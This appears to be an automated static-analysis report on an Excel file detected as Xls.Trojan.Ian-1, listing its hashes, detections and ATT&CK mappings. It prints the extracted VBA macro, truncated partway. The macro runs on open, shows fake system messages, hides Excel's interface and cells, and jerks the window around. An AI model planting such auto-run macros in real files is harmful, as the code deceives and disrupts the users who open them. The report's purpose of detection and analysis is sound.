Xls.Trojan.Ian-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 e498e3948d2f643c…

MALICIOUS

Office (OLE)

Size: 50.5 KB
Created: 2002-04-27 05:09:50
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 61bba3b603f3248b3f39cac8788420db
SHA-1: d9521d58e411888c8c21129ba9a3c1c489c8f901
SHA-256: e498e3948d2f643c74d11214480d1ea6318e9747a0ccb208771b6d7ace8f86ca
Risk Score: 120

Malware Insights

Xls.Trojan.Ian-1 · confidence 90%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The critical ClamAV detection and high-severity heuristic for an Auto_Open macro strongly indicate malicious intent. The VBA script manipulates the Excel interface, displays alarming messages, and attempts to prompt the user for confirmation, which are common tactics for social engineering or to mask further malicious activity. The script's truncated nature prevents a full analysis of its ultimate payload, but its presence and behavior are indicative of a trojan.

Heuristics 3

  • ClamAV: Xls.Trojan.Ian-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Trojan.Ian-1
  • VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]
    Document contains VBA macro code
  • Auto_Open macro [high, OLE_VBA_AUTO]
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18822 bytes
SHA-256: b9ca3b3bd14dcc72da71b3f2b94011564a5fee2bc1b8c7ce7e48f461f6451ec7
First 1,000 lines of the extracted script
Attribute VB_Name = "Ian's Other Macros"

'
' The fun starts here
'

Public Redisplay

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    TrapTime
End Sub

Sub TrapTime()
Attribute TrapTime.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnTime earliesttime:=#1/2/97 10:00:00 AM#, procedure:="MyFinalGiftToYou"
End Sub

Sub MyFinalGiftToYou()
Attribute MyFinalGiftToYou.VB_Description = "Just so you don't forget me!!!!"
Attribute MyFinalGiftToYou.VB_ProcData.VB_Invoke_Func = " \n14"
    Redisplay = False
    Sheets("Data Sheet").Select
    MsgBox "Data Backup is due. " & Chr$(10) & "Please press YES to comence" & Chr$(10) & "or NO to defer until later.", vbInformation + vbYesNo, "Microsoft Excel - System Message"
    Cells.Select
    For Counter = 34 To 36
        Selection.Font.ColorIndex = Counter
    Next
    MsgBox "BEWARE! - Excel is possessed by" & Chr$(10) & " a highly mischievous spirit!" & Chr$(10) & Chr$(10) & "Please PANIC NOW!!!!!!!!!", vbExclamation, "Message from the past"
    Application.DisplayFormulaBar = False
    Application.DisplayStatusBar = False
    Toolbars(2).Visible = False
    Toolbars(1).Visible = False
    ActiveWindow.FreezePanes = False
    With ActiveWindow
        .SplitColumn = 0
        .SplitRow = 0
    End With
    Range("A1").Select
    Selection.AutoFilter
    With ActiveWindow
        .DisplayGridlines = False
        .DisplayHeadings = False
        .DisplayHorizontalScrollBar = False
        .DisplayVerticalScrollBar = False
        .DisplayWorkbookTabs = False
    End With
    Response = MsgBox("Would you like your data back?", vbYesNo + vbQuestion, "Message")
    If Response = vbYes Then
        Redisplay = True
    End If
    If Redisplay = True Then
        Cells.Select
        For Counter = 35 To 34 Step -1
            Selection.Font.ColorIndex = Counter
        Next
        Selection.Font.ColorIndex = xlAutomatic
    End If
    For counter2 = 1 To 2
        With Application
            .WindowState = xlNormal
            .Top = 0
            .Left = 0
            .Width = 605
            .Height = 455
        End With
        With ActiveWindow
            .WindowState = xlNormal
            .Width = 605
            .Height = 425
            .Left = 0
            .Top = 0
        End With
        For Counter = 605 To 125 Step -2
            Application.Width = Counter
        Next
        For Counter = 455 To 35 Step -2
            Application.Height = Counter
        Next
        For Counter = 0 To 220
            With Application
                .Top = Counter
                .Left = Counter
            End With
        Next
        MsgBox "There is nothing you can do" & Chr$(10) & "except sit back and watch.", vbExclamation, "You are no longer in control"
        For Counter = 220 To 0 Step -1
            With Application
                .Top = Counter
                .Left = Counter
            End With
        Next
        For Counter = 125 To 605 Step 2
            Application.Width = Counter
        Next
        For Counter = 35 To 455 Step 2
            Application.Height = Counter
        Next
        Application.WindowState = xlMaximized
        For Counter = 350 To 0 Step -2
            With ActiveWindow
                .Top = 190 - Counter * 0.543
                .Left = 255 - Counter * 0.73
                .Height = 43.45 + Counter * 1.081
                .Width = 75 + Counter * 1.514
            End With
        Next
        For Counter = 350 To 0 Step -2
            With ActiveWindow
                .Top = Counter * 0.543
                .Left = Counter * 0.729
            End With
        Next
        For Counter = 0 To 532 Step 4
            ActiveWindow.Left = Counter
        Next
        For Counter = 0 To 382 Step 2
            ActiveWindow.Top = Counter
        Next
        For Counter = 532 To 0 Step -4
            ActiveWindow.Left = Counter
        Next
        For Counter = 382 To 0 Step -2
           
... (truncated)